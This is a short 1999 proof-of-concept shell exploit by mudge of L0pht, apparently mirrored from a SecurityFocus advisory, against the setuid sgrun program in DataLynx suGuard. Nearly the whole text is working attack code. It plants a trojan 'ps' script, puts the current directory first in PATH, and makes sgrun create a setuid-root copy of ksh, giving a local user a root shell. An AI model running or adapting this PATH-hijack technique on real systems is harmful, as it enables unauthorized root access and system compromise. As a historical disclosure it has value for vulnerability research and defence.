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#source: https://www.securityfocus.com/bid/186/info
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#
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#A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming.
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#!/bin/sh
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# sgrun exploit - the types of vulnerabilities that this exploit exercises
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# have no right being introduced to code in this day and age. Much less
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# code which presents itself under the pretenses of securing your system.
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# .mudge 01.02.99
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#
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SUSHI=./sushi
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if [ $# -ne 2 ] ; then
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echo Must specify path to sgrun [/bin/datalynx/sgrun] and sgrun argument
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echo mudge@l0pht.com [01.02.99]
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exit 1
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fi
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SGRUN=$1
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ARG=$2
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if [ -f ${SUSHI} ] ; then
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echo root shell already created?
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exit
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fi
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echo datalynx sgrun proof of concept exploit from L0pht [mudge@l0pht.com]
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echo
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cat > ./ps << FOEFOE
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#!/bin/sh
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cp /bin/ksh ${SUSHI}
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chown root ${SUSHI}
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chmod 4555 ${SUSHI}
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FOEFOE
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chmod 755 ./ps
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PATH=.:${PATH}
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export PATH
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#/bin/datalynx/sgrun Identify
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${SGRUN} ${ARG}
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if [ -f ${SUSHI} ] ; then
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echo root shell created as ${SUSHI}
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ls -l ${SUSHI}
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echo
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fi |